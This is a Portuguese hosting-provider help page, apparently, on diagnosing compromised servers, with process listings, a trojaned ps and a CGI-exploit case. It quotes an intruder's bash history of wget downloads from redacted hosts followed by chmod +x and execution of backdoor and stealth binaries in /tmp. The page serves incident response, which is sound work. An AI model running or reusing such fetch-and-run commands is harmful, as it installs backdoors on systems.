|
Busca |
Não acontece só aos outros. Um vista de olhos no MRTG nunca engana:   e sobre a máquina encontramos: root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 ... root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 Visivelmente o hacker pode lançar programas em root. A máquina está então hackada e deve ser reinstalada. # netstat -tanpu Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc # ps auxw | grep 28823 root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823 Existe programas em execução, que têm um pid e que não conseguem ser vistos através do ps, certamente porque ps foi substituído por um ps hackado que filtra todos os programas do hacker para enganar. # halt Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003... The system is going down for system halt NOW !! Paramos imediatamente a máquina. Com sorte temos uma máquina apenas Semi Hackada. Ver também: Exemplo de Máquina Hackada . As origens dos problemas são múltiplos, mas podemos resumi-los desta forma:
Se não actualiza a sua máquina com releases ReleasePatchSeguranca, arrisca a ter a sua máquina hackada (mais ou menos 250 scans são efectuados por dia sobre a nossa rede no âmbito de detectar as falhas de segurança). Em caso de hack, o seu servidor será posto em modo de rescue FTP automaticamente, e receberá os seus códigos de acesso por e-mail. Poderá ainda pedir ao suporte para passar o seu servidor para o modo de Rescue, unicamente por ticket incidente, justificando ainda o seu pedido e a sua plena consciência que deverá corrigir o problema antes de re-activar o servidor. Estaremos atentos para o facto de que precisa corrigir as falhas antes de colocar o servidor em funcionamento normal da rede (modo HDD) . Falha de script CGI Os sintomas Um ficheiro g00dies.tgz transferido na pasta /tmp com outros ficheiros x, k, etc... O programa x é um backdoor. Se executado dará acesso a máquina. Encontramos o bash.history do utilizador nobody em /tmp, cujo o conteúdo é: cd /tmp wget www.#######.com/x chmod +x x ./s ./x ./x ./x ./x./x ./x ./x ./x ./x wget www.#######.com/k chmod +x k ./k -d; /tmp/x ./x ./x ./x ./x ./x ./x ./ cd /tmp mkdir ., cd ., wget ######.go.ro/vampix tar zxvf vampix cd esc ./mingetty ./mingetty ./mingetty cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp cd /tmp wget ######.go.ro/smth chmod +x smth ./smth cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp /tmp/smth /tmp/stealth O que se constata Conseguimos ver que foram executados comandos em nobody, porém este utilizador é essencialmente utilizado por Apache. Parece que o hacker aproveitou de uma vulnerabilidade de um script CGI. Resolução - Kill de todos os processos suspeitos em curso. O hacker pelos visto não passou por root (pode aproveitar uma falha de um kernel<2.4.24), no entanto, fazermos algumas operações/verificações elementares:
- Consulte depois os logs de Apache por volta da hora na qual houve esse hack para encontrar o script em causa. |
